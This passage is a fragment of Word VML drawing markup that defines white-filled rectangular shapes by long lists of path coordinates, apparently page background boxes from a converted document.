1690,2215,1690,2215,1690,2214,1690,2214,1690,2214,1690,2214,1690,2214,1690,2214,1690,2214,1690,2214,1690,2213,1690,2213,1690,2213,1690,2213,1690,2213,1690,2212,1690,2212,1690,2212,1690,2212,1690,2211,1690,2211,1690,2211,1690,2210,1690,2210,1690,2209,1690,2209,1690,2209,1690,2208,1690,2208,1690,2207,1690,2207,1690,2206,1690,2206,1690,2205,1690,2205,1690,2204,1690,2203,1690,2203,1690,2202,1690,2201,1690,2200,1690,2200,1690,2199,1690,2198,1690,2197,1690,2196,1690,2196,1690,2195,1690,2194,1690,2193,1690,2192,1690,2191,1690,2190,1690,2189,1690,2187,1690,2186,1690,2185,1690,2184,1690,2183,1690,2181,1690,2180,1690,2179,1690,2177,1690,2176,1690,2174,1690,2173,1690,2171,1690,2170,1690,2168,1690,2167,1690,2165,1690,2163,1690,2161,1690,2160,1690,2158,1690,2156,1690,2154,1690,2152,1690,2150,1690,2148,1690,2146,1690,2144,1690,2142,1690,2140,1690,2137,1690,2135,1690,2133,1690,2130,1690,2128,1690,2125,1690,2123,1690,2120,1690,2118,1690,2115,1690,2112,1690,2110,1690,2107,1690,2104,1690,2101,1690,2098,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1690,2095,1689,2095,1689,2095,1689,2095,1689,2095,1689,2095,1689,2095,1689,2095,1688,2095,1688,2095,1688,2095,1688,2095,1687,2095,1687,2095,1687,2095,1687,2095,1686,2095,1686,2095,1685,2095,1685,2095,1684,2095,1684,2095,1683,2095,1683,2095,1682,2095,1682,2095,1681,2095,1680,2095,1679,2095,1679,2095,1678,2095,1677,2095,1676,2095,1675,2095,1674,2095,1673,2095,1672,2095,1671,2095,1670,2095,1669,2095,1667,2095,1666,2095,1665,2095,1663,2095,1662,2095,1660,2095,1659,2095,1657,2095,1655,2095,1654,2095,1652,2095,1650,2095,1648,2095,1646,2095,1644,2095,1642,2095,1640,2095,1638,2095,1636,2095,1633,2095,1631,2095,1629,2095,1626,2095,1623,2095,1621,2095,1618,2095,1615,2095,1612,2095,1609,2095,1606,2095,1603,2095,1600,2095,1597,2095,1594,2095,1590,2095,1587,2095,1583,2095,1579,2095,1576,2095,1572,2095,1568,2095,1564,2095,1560,2095,1556,2095,1552,2095,1547,2095,1543,2095,1538,2095,1534,2095,1529,2095,1524,2095,1520,2095,1515,2095,1510,2095,1504,2095,1499,2095,1494,2095,1488,2095,1483,2095,1477,2095,1471,2095,1466,2095,1460,2095,1454,2095,1447,2095,1441,2095,1435e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:88.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,1770" coordsize="250,270">
        <v:shape style="position:absolute;left:1950;top:1770;width:250;height:270" coordorigin="1950,1770" coordsize="250,270" path="m1975,1795l1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1975,1795,1976,1795,1976,1795,1976,1795,1976,1795,1976,1795,1976,1795,1977,1795,1977,1795,1977,1795,1977,1795,1977,1795,1978,1795,1978,1795,1978,1795,1979,1795,1979,1795,1980,1795,1980,1795,1981,1795,1981,1795,1982,1795,1982,1795,1983,1795,1983,1795,1984,1795,1985,1795,1986,1795,1986,1795,1987,1795,1988,1795,1989,1795,1990,1795,1991,1795,1992,1795,1993,1795,1994,1795,1995,1795,1996,1795,1997,1795,1999,1795,2000,1795,2001,1795,2003,1795,2004,1795,2006,1795,2007,1795,2009,1795,2011,1795,2012,1795,2014,1795,2016,1795,2018,1795,2020,1795,2022,1795,2024,1795,2026,1795,2028,1795,2030,1795,2033,1795,2035,1795,2038,1795,2040,1795,2043,1795,2045,1795,2048,1795,2051,1795,2054,1795,2056,1795,2059,1795,2063,1795,2066,1795,2069,1795,2072,1795,2075,1795,2079,1795,2082,1795,2086,1795,2090,1795,2093,1795,2097,1795,2101,1795,2105,1795,2109,1795,2113,1795,2117,1795,2122,1795,2126,1795,2131,1795,2135,1795,2140,1795,2145,1795,2150,1795,2154,1795,2160,1795,2165,1795,2170,1795,2175,1795,2181,1795,2186,1795,2192,1795,2197,1795,2203,1795,2209,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1795,2215,1796,2215,1796,2215,1796,2215,1796,2215,1796,2215,1796,2215,1797,2215,1797,2215,1797,2215,1797,2215,1798,2215,1798,2215,1798,2215,1799,2215,1799,2215,1799,2215,1800,2215,1800,2215,1801,2215,1801,2215,1802,2215,1803,2215,1803,2215,1804,2215,1805,2215,1805,2215,1806,2215,1807,2215,1808,2215,1809,2215,1810,2215,1811,2215,1812,2215,1813,2215,1814,2215,1815,2215,1816,2215,1817,2215,1819,2215,1820,2215,1821,2215,1823,2215,1824,2215,1826,2215,1828,2215,1829,2215,1831,2215,1833,2215,1835,2215,1836,2215,1838,2215,1840,2215,1843,2215,1845,2215,1847,2215,1849,2215,1851,2215,1854,2215,1856,2215,1859,2215,1861,2215,1864,2215,1867,2215,1870,2215,1872,2215,1875,2215,1878,2215,1881,2215,1885,2215,1888,2215,1891,2215,1895,2215,1898,2215,1902,2215,1905,2215,1909,2215,1913,2215,1917,2215,1921,2215,1925,2215,1929,2215,1933,2215,1937,2215,1942,2215,1946,2215,1951,2215,1956,2215,1960,2215,1965,2215,1970,2215,1975,2215,1980,2215,1986,2215,1991,2215,1996,2215,2002,2215,2008,2215,2013,2215,2019,2215,2025,2215,2031,2215,2037,2215,2044,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2215,2050,2214,2050,2214,2050,2214,2050,2214,2050,2214,2050,2214,2050,2213,2050,2213,2050,2213,2050,2213,2050,2212,2050,2212,2050,2212,2050,2211,2050,2211,2050,2210,2050,2210,2050,2210,2050,2209,2050,2208,2050,2208,2050,2207,2050,2207,2050,2206,2050,2205,2050,2205,2050,2204,2050,2203,2050,2202,2050,2201,2050,2200,2050,2199,2050,2198,2050,2197,2050,2196,2050,2195,2050,2194,2050,2193,2050,2191,2050,2190,2050,2189,2050,2187,2050,2186,2050,2184,2050,2183,2050,2181,2050,2179,2050,2178,2050,2176,2050,2174,2050,2172,2050,2170,2050,2168,2050,2166,2050,2164,2050,2162,2050,2160,2050,2157,2050,2155,2050,2153,2050,2150,2050,2147,2050,2145,2050,2142,2050,2139,2050,2137,2050,2134,2050,2131,2050,2128,2050,2124,2050,2121,2050,2118,2050,2115,2050,2111,2050,2108,2050,2104,2050,2101,2050,2097,2050,2093,2050,2089,2050,2085,2050,2081,2050,2077,2050,2073,2050,2068,2050,2064,2050,2059,2050,2055,2050,2050,2050,2045,2050,2041,2050,2036,2050,2031,2050,2025,2050,2020,2050,2015,2050,2010,2050,2004,2050,1998,2050,1993,2050,1987,2050,1981,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2050,1975,2049,1975,2049,1975,2049,1975,2049,1975,2049,1975,2049,1975,2048,1975,2048,1975,2048,1975,2048,1975,2047,1975,2047,1975,2047,1975,2046,1975,2046,1975,2046,1975,2045,1975,2045,1975,2044,1975,2044,1975,2043,1975,2042,1975,2042,1975,2041,1975,2040,1975,2040,1975,2039,1975,2038,1975,2037,1975,2036,1975,2035,1975,2034,1975,2033,1975,2032,1975,2031,1975,2030,1975,2029,1975,2027,1975,2026,1975,2025,1975,2023,1975,2022,1975,2020,1975,2019,1975,2017,1975,2016,1975,2014,1975,2012,1975,2010,1975,2008,1975,2007,1975,2004,1975,2002,1975,2000,1975,1998,1975,1996,1975,1994,1975,1991,1975,1989,1975,1986,1975,1984,1975,1981,1975,1978,1975,1975,1975,1973,1975,1970,1975,1967,1975,1963,1975,1960,1975,1957,1975,1954,1975,1950,1975,1947,1975,1943,1975,1940,1975,1936,1975,1932,1975,1928,1975,1924,1975,1920,1975,1916,1975,1912,1975,1908,1975,1903,1975,1899,1975,1894,1975,1889,1975,1885,1975,1880,1975,1875,1975,1870,1975,1865,1975,1859,1975,1854,1975,1849,1975,1843,1975,1837,1975,1832,1975,1826,1975,1820,1975,1814,1975,1808,1975,1801,1975,1795e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:107.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,2150" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:2150;width:130;height:270" coordorigin="1950,2150" coordsize="130,270" path="m1975,2170l1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1975,2170,1976,2170,1976,2170,1976,2170,1976,2170,1976,2170,1976,2170,1976,2170,1976,2170,1977,2170,1977,2170,1977,2170,1977,2170,1977,2170,1978,2170,1978,2170,1978,2170,1978,2170,1979,2170,1979,2170,1979,2170,1980,2170,1980,2170,1980,2170,1981,2170,1981,2170,1981,2170,1982,2170,1982,2170,1983,2170,1983,2170,1984,2170,1984,2170,1985,2170,1986,2170,1986,2170,1987,2170,1988,2170,1988,2170,1989,2170,1990,2170,1990,2170,1991,2170,1992,2170,1993,2170,1994,2170,1995,2170,1995,2170,1996,2170,1997,2170,1998,2170,1999,2170,2000,2170,2002,2170,2003,2170,2004,2170,2005,2170,2006,2170,2008,2170,2009,2170,2010,2170,2011,2170,2013,2170,2014,2170,2016,2170,2017,2170,2019,2170,2020,2170,2022,2170,2024,2170,2025,2170,2027,2170,2029,2170,2030,2170,2032,2170,2034,2170,2036,2170,2038,2170,2040,2170,2042,2170,2044,2170,2046,2170,2048,2170,2051,2170,2053,2170,2055,2170,2057,2170,2060,2170,2062,2170,2065,2170,2067,2170,2070,2170,2072,2170,2075,2170,2078,2170,2081,2170,2083,2170,2086,2170,2089,2170,2092,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2171,2095,2171,2095,2171,2095,2171,2095,2171,2095,2171,2095,2171,2095,2171,2095,2172,2095,2172,2095,2172,2095,2172,2095,2173,2095,2173,2095,2173,2095,2174,2095,2174,2095,2175,2095,2175,2095,2176,2095,2176,2095,2177,2095,2177,2095,2178,2095,2178,2095,2179,2095,2180,2095,2181,2095,2181,2095,2182,2095,2183,2095,2184,2095,2185,2095,2186,2095,2187,2095,2188,2095,2189,2095,2190,2095,2191,2095,2193,2095,2194,2095,2195,2095,2197,2095,2198,2095,2200,2095,2201,2095,2203,2095,2204,2095,2206,2095,2208,2095,2210,2095,2212,2095,2214,2095,2216,2095,2218,2095,2220,2095,2222,2095,2224,2095,2227,2095,2229,2095,2231,2095,2234,2095,2237,2095,2239,2095,2242,2095,2245,2095,2248,2095,2251,2095,2254,2095,2257,2095,2260,2095,2263,2095,2266,2095,2270,2095,2273,2095,2277,2095,2280,2095,2284,2095,2288,2095,2292,2095,2296,2095,2300,2095,2304,2095,2308,2095,2313,2095,2317,2095,2321,2095,2326,2095,2331,2095,2336,2095,2340,2095,2345,2095,2350,2095,2356,2095,2361,2095,2366,2095,2372,2095,2377,2095,2383,2095,2389,2095,2394,2095,2400,2095,2406,2095,2413,2095,2419,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2094,2425,2094,2425,2094,2425,2094,2425,2094,2425,2094,2425,2094,2425,2094,2425,2093,2425,2093,2425,2093,2425,2093,2425,2093,2425,2092,2425,2092,2425,2092,2425,2092,2425,2091,2425,2091,2425,2091,2425,2090,2425,2090,2425,2090,2425,2089,2425,2089,2425,2089,2425,2088,2425,2088,2425,2087,2425,2087,2425,2086,2425,2086,2425,2085,2425,2084,2425,2084,2425,2083,2425,2083,2425,2082,2425,2081,2425,2080,2425,2080,2425,2079,2425,2078,2425,2077,2425,2076,2425,2075,2425,2075,2425,2074,2425,2073,2425,2072,2425,2071,2425,2070,2425,2068,2425,2067,2425,2066,2425,2065,2425,2064,2425,2063,2425,2061,2425,2060,2425,2059,2425,2057,2425,2056,2425,2054,2425,2053,2425,2051,2425,2050,2425,2048,2425,2047,2425,2045,2425,2043,2425,2041,2425,2040,2425,2038,2425,2036,2425,2034,2425,2032,2425,2030,2425,2028,2425,2026,2425,2024,2425,2022,2425,2019,2425,2017,2425,2015,2425,2013,2425,2010,2425,2008,2425,2005,2425,2003,2425,2000,2425,1998,2425,1995,2425,1992,2425,1990,2425,1987,2425,1984,2425,1981,2425,1978,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2425,1975,2424,1975,2424,1975,2424,1975,2424,1975,2424,1975,2424,1975,2423,1975,2423,1975,2423,1975,2423,1975,2422,1975,2422,1975,2422,1975,2421,1975,2421,1975,2420,1975,2420,1975,2419,1975,2419,1975,2418,1975,2418,1975,2417,1975,2416,1975,2416,1975,2415,1975,2414,1975,2413,1975,2412,1975,2411,1975,2410,1975,2410,1975,2408,1975,2407,1975,2406,1975,2405,1975,2404,1975,2403,1975,2401,1975,2400,1975,2399,1975,2397,1975,2396,1975,2394,1975,2393,1975,2391,1975,2389,1975,2387,1975,2386,1975,2384,1975,2382,1975,2380,1975,2378,1975,2375,1975,2373,1975,2371,1975,2369,1975,2366,1975,2364,1975,2361,1975,2359,1975,2356,1975,2353,1975,2351,1975,2348,1975,2345,1975,2342,1975,2339,1975,2335,1975,2332,1975,2329,1975,2326,1975,2322,1975,2318,1975,2315,1975,2311,1975,2307,1975,2303,1975,2299,1975,2295,1975,2291,1975,2287,1975,2283,1975,2278,1975,2274,1975,2269,1975,2265,1975,2260,1975,2255,1975,2250,1975,2245,1975,2240,1975,2235,1975,2229,1975,2224,1975,2218,1975,2213,1975,2207,1975,2201,1975,2195,1975,2189,1975,2183,1975,2176,1975,2170e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:107.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,2150" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:2150;width:130;height:270" coordorigin="2070,2150" coordsize="130,270" path="m2095,2170l2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2095,2170,2096,2170,2096,2170,2096,2170,2096,2170,2096,2170,2096,2170,2096,2170,2096,2170,2096,2170,2097,2170,2097,2170,2097,2170,2097,2170,2097,2170,2098,2170,2098,2170,2098,2170,2098,2170,2099,2170,2099,2170,2099,2170,2100,2170,2100,2170,2100,2170,2101,2170,2101,2170,2102,2170,2102,2170,2102,2170,2103,2170,2103,2170,2104,2170,2105,2170,2105,2170,2106,2170,2106,2170,2107,2170,2108,2170,2108,2170,2109,2170,2110,2170,2110,2170,2111,2170,2112,2170,2113,2170,2114,2170,2115,2170,2116,2170,2116,2170,2117,2170,2118,2170,2119,2170,2121,2170,2122,2170,2123,2170,2124,2170,2125,2170,2126,2170,2128,2170,2129,2170,2130,2170,2132,2170,2133,2170,2134,2170,2136,2170,2137,2170,2139,2170,2140,2170,2142,2170,2144,2170,2145,2170,2147,2170,2149,2170,2151,2170,2152,2170,2154,2170,2156,2170,2158,2170,2160,2170,2162,2170,2164,2170,2166,2170,2168,2170,2171,2170,2173,2170,2175,2170,2178,2170,2180,2170,2182,2170,2185,2170,2187,2170,2190,2170,2192,2170,2195,2170,2198,2170,2201,2170,2203,2170,2206,2170,2209,2170,2212,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2170,2215,2171,2215,2171,2215,2171,2215,2171,2215,2171,2215,2171,2215,2171,2215,2171,2215,2172,2215,2172,2215,2172,2215,2172,2215,2173,2215,2173,2215,2173,2215,2174,2215,2174,2215,2175,2215,2175,2215,2176,2215,2176,2215,2177,2215,2177,2215,2178,2215,2178,2215,2179,2215,2180,2215,2181,2215,2181,2215,2182,2215,2183,2215,2184,2215,2185,2215,2186,2215,2187,2215,2188,2215,2189,2215,2190,2215,2191,2215,2193,2215,2194,2215,2195,2215,2197,2215,2198,2215,2200,2215,2201,2215,2203,2215,2204,2215,2206,2215,2208,2215,2210,2215,2212,2215,2214,2215,2216,2215,2218,2215,2220,2215,2222,2215,2224,2215,2227,2215,2229,2215,2231,2215,2234,2215,2237,2215,2239,2215,2242,2215,2245,2215,2248,2215,2251,2215,2254,2215,2257,2215,2260,2215,2263,2215,2266,2215,2270,2215,2273,2215,2277,2215,2280,2215,2284,2215,2288,2215,2292,2215,2296,2215,2300,2215,2304,2215,2308,2215,2313,2215,2317,2215,2321,2215,2326,2215,2331,2215,2336,2215,2340,2215,2345,2215,2350,2215,2356,2215,2361,2215,2366,2215,2372,2215,2377,2215,2383,2215,2389,2215,2394,2215,2400,2215,2406,2215,2413,2215,2419,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2215,2425,2214,2425,2214,2425,2214,2425,2214,2425,2214,2425,2214,2425,2214,2425,2214,2425,2213,2425,2213,2425,2213,2425,2213,2425,2213,2425,2212,2425,2212,2425,2212,2425,2212,2425,2211,2425,2211,2425,2211,2425,2210,2425,2210,2425,2209,2425,2209,2425,2209,2425,2208,2425,2208,2425,2207,2425,2207,2425,2206,2425,2206,2425,2205,2425,2205,2425,2204,2425,2203,2425,2203,2425,2202,2425,2201,2425,2200,2425,2200,2425,2199,2425,2198,2425,2197,2425,2196,2425,2196,2425,2195,2425,2194,2425,2193,2425,2192,2425,2191,2425,2190,2425,2189,2425,2187,2425,2186,2425,2185,2425,2184,2425,2183,2425,2181,2425,2180,2425,2179,2425,2177,2425,2176,2425,2174,2425,2173,2425,2171,2425,2170,2425,2168,2425,2167,2425,2165,2425,2163,2425,2161,2425,2160,2425,2158,2425,2156,2425,2154,2425,2152,2425,2150,2425,2148,2425,2146,2425,2144,2425,2142,2425,2140,2425,2137,2425,2135,2425,2133,2425,2130,2425,2128,2425,2125,2425,2123,2425,2120,2425,2118,2425,2115,2425,2112,2425,2110,2425,2107,2425,2104,2425,2101,2425,2098,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2425,2095,2424,2095,2424,2095,2424,2095,2424,2095,2424,2095,2424,2095,2423,2095,2423,2095,2423,2095,2423,2095,2422,2095,2422,2095,2422,2095,2421,2095,2421,2095,2420,2095,2420,2095,2419,2095,2419,2095,2418,2095,2418,2095,2417,2095,2416,2095,2416,2095,2415,2095,2414,2095,2413,2095,2412,2095,2411,2095,2410,2095,2410,2095,2408,2095,2407,2095,2406,2095,2405,2095,2404,2095,2403,2095,2401,2095,2400,2095,2399,2095,2397,2095,2396,2095,2394,2095,2393,2095,2391,2095,2389,2095,2387,2095,2386,2095,2384,2095,2382,2095,2380,2095,2378,2095,2375,2095,2373,2095,2371,2095,2369,2095,2366,2095,2364,2095,2361,2095,2359,2095,2356,2095,2353,2095,2351,2095,2348,2095,2345,2095,2342,2095,2339,2095,2335,2095,2332,2095,2329,2095,2326,2095,2322,2095,2318,2095,2315,2095,2311,2095,2307,2095,2303,2095,2299,2095,2295,2095,2291,2095,2287,2095,2283,2095,2278,2095,2274,2095,2269,2095,2265,2095,2260,2095,2255,2095,2250,2095,2245,2095,2240,2095,2235,2095,2229,2095,2224,2095,2218,2095,2213,2095,2207,2095,2201,2095,2195,2095,2189,2095,2183,2095,2176,2095,2170e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:152.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,3050" coordsize="250,270">
        <v:shape style="position:absolute;left:1950;top:3050;width:250;height:270" coordorigin="1950,3050" coordsize="250,270" path="m1975,3071l1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1975,3071,1976,3071,1976,3071,1976,3071,1976,3071,1976,3071,1976,3071,1977,3071,1977,3071,1977,3071,1977,3071,1977,3071,1978,3071,1978,3071,1978,3071,1979,3071,1979,3071,1980,3071,1980,3071,1981,3071,1981,3071,1982,3071,1982,3071,1983,3071,1983,3071,1984,3071,1985,3071,1986,3071,1986,3071,1987,3071,1988,3071,1989,3071,1990,3071,1991,3071,1992,3071,1993,3071,1994,3071,1995,3071,1996,3071,1997,3071,1999,3071,2000,3071,2001,3071,2003,3071,2004,3071,2006,3071,2007,3071,2009,3071,2011,3071,2012,3071,2014,3071,2016,3071,2018,3071,2020,3071,2022,3071,2024,3071,2026,3071,2028,3071,2030,3071,2033,3071,2035,3071,2038,3071,2040,3071,2043,3071,2045,3071,2048,3071,2051,3071,2054,3071,2056,3071,2059,3071,2063,3071,2066,3071,2069,3071,2072,3071,2075,3071,2079,3071,2082,3071,2086,3071,2090,3071,2093,3071,2097,3071,2101,3071,2105,3071,2109,3071,2113,3071,2117,3071,2122,3071,2126,3071,2131,3071,2135,3071,2140,3071,2145,3071,2150,3071,2154,3071,2160,3071,2165,3071,2170,3071,2175,3071,2181,3071,2186,3071,2192,3071,2197,3071,2203,3071,2209,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3071,2215,3072,2215,3072,2215,3072,2215,3072,2215,3072,2215,3073,2215,3073,2215,3073,2215,3074,2215,3074,2215,3074,2215,3075,2215,3075,2215,3076,2215,3076,2215,3076,2215,3077,2215,3078,2215,3078,2215,3079,2215,3080,2215,3080,2215,3081,2215,3082,2215,3083,2215,3083,2215,3084,2215,3085,2215,3086,2215,3087,2215,3088,2215,3089,2215,3091,2215,3092,2215,3093,2215,3094,2215,3096,2215,3097,2215,3099,2215,3100,2215,3102,2215,3103,2215,3105,2215,3107,2215,3108,2215,3110,2215,3112,2215,3114,2215,3116,2215,3118,2215,3120,2215,3122,2215,3125,2215,3127,2215,3129,2215,3132,2215,3134,2215,3137,2215,3140,2215,3142,2215,3145,2215,3148,2215,3151,2215,3154,2215,3157,2215,3160,2215,3164,2215,3167,2215,3170,2215,3174,2215,3177,2215,3181,2215,3185,2215,3188,2215,3192,2215,3196,2215,3200,2215,3204,2215,3209,2215,3213,2215,3217,2215,3222,2215,3227,2215,3231,2215,3236,2215,3241,2215,3246,2215,3251,2215,3256,2215,3261,2215,3267,2215,3272,2215,3278,2215,3283,2215,3289,2215,3295,2215,3301,2215,3307,2215,3313,2215,3319,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2215,3326,2214,3326,2214,3326,2214,3326,2214,3326,2214,3326,2214,3326,2213,3326,2213,3326,2213,3326,2213,3326,2212,3326,2212,3326,2212,3326,2211,3326,2211,3326,2210,3326,2210,3326,2210,3326,2209,3326,2208,3326,2208,3326,2207,3326,2207,3326,2206,3326,2205,3326,2205,3326,2204,3326,2203,3326,2202,3326,2201,3326,2200,3326,2199,3326,2198,3326,2197,3326,2196,3326,2195,3326,2194,3326,2193,3326,2191,3326,2190,3326,2189,3326,2187,3326,2186,3326,2184,3326,2183,3326,2181,3326,2179,3326,2178,3326,2176,3326,2174,3326,2172,3326,2170,3326,2168,3326,2166,3326,2164,3326,2162,3326,2160,3326,2157,3326,2155,3326,2153,3326,2150,3326,2147,3326,2145,3326,2142,3326,2139,3326,2137,3326,2134,3326,2131,3326,2128,3326,2124,3326,2121,3326,2118,3326,2115,3326,2111,3326,2108,3326,2104,3326,2101,3326,2097,3326,2093,3326,2089,3326,2085,3326,2081,3326,2077,3326,2073,3326,2068,3326,2064,3326,2059,3326,2055,3326,2050,3326,2045,3326,2041,3326,2036,3326,2031,3326,2025,3326,2020,3326,2015,3326,2010,3326,2004,3326,1998,3326,1993,3326,1987,3326,1981,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3326,1975,3325,1975,3325,1975,3325,1975,3325,1975,3325,1975,3325,1975,3325,1975,3325,1975,3325,1975,3324,1975,3324,1975,3324,1975,3324,1975,3324,1975,3323,1975,3323,1975,3323,1975,3322,1975,3322,1975,3322,1975,3321,1975,3321,1975,3320,1975,3320,1975,3319,1975,3319,1975,3318,1975,3317,1975,3317,1975,3316,1975,3315,1975,3314,1975,3314,1975,3313,1975,3312,1975,3311,1975,3310,1975,3309,1975,3308,1975,3307,1975,3306,1975,3304,1975,3303,1975,3302,1975,3300,1975,3299,1975,3298,1975,3296,1975,3295,1975,3293,1975,3291,1975,3290,1975,3288,1975,3286,1975,3284,1975,3282,1975,3280,1975,3278,1975,3276,1975,3274,1975,3271,1975,3269,1975,3267,1975,3264,1975,3262,1975,3259,1975,3257,1975,3254,1975,3251,1975,3248,1975,3245,1975,3242,1975,3239,1975,3236,1975,3233,1975,3229,1975,3226,1975,3223,1975,3219,1975,3215,1975,3212,1975,3208,1975,3204,1975,3200,1975,3196,1975,3192,1975,3187,1975,3183,1975,3179,1975,3174,1975,3170,1975,3165,1975,3160,1975,3155,1975,3150,1975,3145,1975,3140,1975,3135,1975,3130,1975,3124,1975,3119,1975,3113,1975,3107,1975,3101,1975,3095,1975,3089,1975,3083,1975,3077,1975,3071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:171.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,3430" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:3430;width:130;height:270" coordorigin="1950,3430" coordsize="130,270" path="m1975,3446l1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1975,3446,1976,3446,1976,3446,1976,3446,1976,3446,1976,3446,1976,3446,1976,3446,1976,3446,1977,3446,1977,3446,1977,3446,1977,3446,1977,3446,1978,3446,1978,3446,1978,3446,1978,3446,1979,3446,1979,3446,1979,3446,1980,3446,1980,3446,1980,3446,1981,3446,1981,3446,1981,3446,1982,3446,1982,3446,1983,3446,1983,3446,1984,3446,1984,3446,1985,3446,1986,3446,1986,3446,1987,3446,1988,3446,1988,3446,1989,3446,1990,3446,1990,3446,1991,3446,1992,3446,1993,3446,1994,3446,1995,3446,1995,3446,1996,3446,1997,3446,1998,3446,1999,3446,2000,3446,2002,3446,2003,3446,2004,3446,2005,3446,2006,3446,2008,3446,2009,3446,2010,3446,2011,3446,2013,3446,2014,3446,2016,3446,2017,3446,2019,3446,2020,3446,2022,3446,2024,3446,2025,3446,2027,3446,2029,3446,2030,3446,2032,3446,2034,3446,2036,3446,2038,3446,2040,3446,2042,3446,2044,3446,2046,3446,2048,3446,2051,3446,2053,3446,2055,3446,2057,3446,2060,3446,2062,3446,2065,3446,2067,3446,2070,3446,2072,3446,2075,3446,2078,3446,2081,3446,2083,3446,2086,3446,2089,3446,2092,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3446,2095,3447,2095,3447,2095,3447,2095,3447,2095,3447,2095,3448,2095,3448,2095,3448,2095,3448,2095,3449,2095,3449,2095,3449,2095,3450,2095,3450,2095,3451,2095,3451,2095,3452,2095,3452,2095,3453,2095,3453,2095,3454,2095,3455,2